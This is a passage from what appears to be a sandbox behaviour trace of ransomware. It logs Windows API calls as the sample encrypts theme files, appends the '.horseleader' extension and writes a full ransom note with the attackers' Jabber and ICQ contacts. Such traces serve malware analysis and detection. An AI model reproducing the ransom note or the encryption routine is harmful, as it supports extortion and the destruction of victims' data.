liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.666] CloseHandle (hObject=0x1a4) returned 1 [0247.666] GetProcessHeap () returned 0x780000 [0247.666] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.666] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM.horseleader") returned 91 [0247.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.elm.horseleader")) returned 1 [0247.669] GetProcessHeap () returned 0x780000 [0247.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.669] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a84fa90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="REFINED.INF", cAlternateFileName="")) returned 1 [0247.669] lstrcmpiW (lpString1="REFINED.INF", lpString2="Windows") returned -1 [0247.669] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF") returned 79 [0247.669] StrStrIW (lpFirst="REFINED.INF", lpSrch=".horseleader") returned 0x0 [0247.669] lstrcmpW (lpString1="REFINED.INF", lpString2="#Decrypt#.txt") returned 1 [0247.669] lstrcmpW (lpString1="REFINED.INF", lpString2="_uninstalling_.png") returned 1 [0247.670] lstrlenW (lpString=".testttjffg") returned 11 [0247.670] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF", lpSrch=".testttjffg") returned 0x0 [0247.670] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.670] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF") returned 79 [0247.671] StrStrW (lpFirst="REFINED.INF", lpSrch=".txt") returned 0x0 [0247.671] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=586) returned 1 [0247.671] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.672] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.673] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.673] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.673] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.673] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.673] CloseHandle (hObject=0x1a4) returned 1 [0247.673] GetProcessHeap () returned 0x780000 [0247.674] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.674] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF.horseleader") returned 91 [0247.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\REFINED.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\refined.inf.horseleader")) returned 1 [0247.676] GetProcessHeap () returned 0x780000 [0247.676] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.676] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3d79, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.676] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.677] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 80 [0247.677] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.677] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.677] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.677] lstrlenW (lpString=".testttjffg") returned 11 [0247.677] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.677] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.678] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 80 [0247.678] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.678] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=15737) returned 1 [0247.678] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3d79, lpOverlapped=0x0) returned 1 [0247.680] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc287, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3d79, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3d79, lpOverlapped=0x0) returned 1 [0247.681] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.681] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.681] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.681] CloseHandle (hObject=0x1a4) returned 1 [0247.681] GetProcessHeap () returned 0x780000 [0247.681] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.682] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.horseleader") returned 92 [0247.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.horseleader")) returned 1 [0247.683] GetProcessHeap () returned 0x780000 [0247.683] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.683] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3d79, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.683] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.683] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\#Decrypt#.txt") returned 81 [0247.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.684] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.684] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.685] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.685] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.685] CloseHandle (hObject=0x158) returned 1 [0247.685] GetProcessHeap () returned 0x780000 [0247.686] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.686] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RICEPAPR", cAlternateFileName="")) returned 1 [0247.686] lstrcmpiW (lpString1="RICEPAPR", lpString2="Windows") returned -1 [0247.686] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR") returned 68 [0247.686] lstrcmpW (lpString1="RICEPAPR", lpString2=".") returned 1 [0247.686] lstrcmpW (lpString1="RICEPAPR", lpString2="..") returned 1 [0247.686] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.686] GetProcessHeap () returned 0x780000 [0247.686] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.686] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*") returned 70 [0247.686] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.691] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.691] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\.") returned 70 [0247.691] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.691] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.691] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.692] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\..") returned 71 [0247.692] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.692] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.692] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xf82, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.692] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.692] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 80 [0247.692] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.692] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.692] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.692] lstrlenW (lpString=".testttjffg") returned 11 [0247.692] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.692] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.692] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.693] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 80 [0247.693] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.693] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3970) returned 1 [0247.693] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xf82, lpOverlapped=0x0) returned 1 [0247.695] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff07e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.695] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xf82, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xf82, lpOverlapped=0x0) returned 1 [0247.695] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.695] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.696] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.696] CloseHandle (hObject=0x1a4) returned 1 [0247.696] GetProcessHeap () returned 0x780000 [0247.696] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.696] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.horseleader") returned 92 [0247.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.horseleader")) returned 1 [0247.697] GetProcessHeap () returned 0x780000 [0247.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.697] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ffb1e00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ffb1e00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1205e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RICEPAPR.ELM", cAlternateFileName="")) returned 1 [0247.697] lstrcmpiW (lpString1="RICEPAPR.ELM", lpString2="Windows") returned -1 [0247.697] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM") returned 81 [0247.697] StrStrIW (lpFirst="RICEPAPR.ELM", lpSrch=".horseleader") returned 0x0 [0247.697] lstrcmpW (lpString1="RICEPAPR.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.698] lstrcmpW (lpString1="RICEPAPR.ELM", lpString2="_uninstalling_.png") returned 1 [0247.698] lstrlenW (lpString=".testttjffg") returned 11 [0247.698] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 